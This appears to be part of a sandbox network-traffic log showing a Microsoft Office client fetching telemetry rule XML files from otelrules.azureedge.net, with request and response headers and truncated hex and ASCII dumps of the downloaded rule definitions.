                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        99192.168.2.54980813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6a0cb2be-701e-0032-13a8-34a540000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-r178fb8d765th6bkhC1DFWr7h000000002ng00000000m99u
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        100192.168.2.54980913.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-16547b76f7flf9g6hC1DFWmcx800000009b0000000007qsn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        101192.168.2.54981013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-16547b76f7f22sh5hC1DFWyb4w0000000ksg000000002shb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        102192.168.2.54981113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-16547b76f7fkcrm9hC1DFWxdag0000000kv000000000dx03
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        103192.168.2.54981313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1390
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 157887d5-b01e-0084-44d2-2cd736000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-16547b76f7fx6rhxhC1DFW76kg0000000kng00000000mq83
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        104192.168.2.54981213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1427
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-16547b76f7f4k79zhC1DFWu9y00000000kr000000000kenc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        105192.168.2.54981413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: bad46039-901e-002a-55a8-347a27000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-r178fb8d7655k45rhC1DFWpsgg00000002g000000000gh53
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        106192.168.2.54981613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:39 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:40 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:39 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e59c32fc-b01e-005c-5110-364c66000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142539Z-r178fb8d765z9wvrhC1DFW1a0s00000000s000000000cegc
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
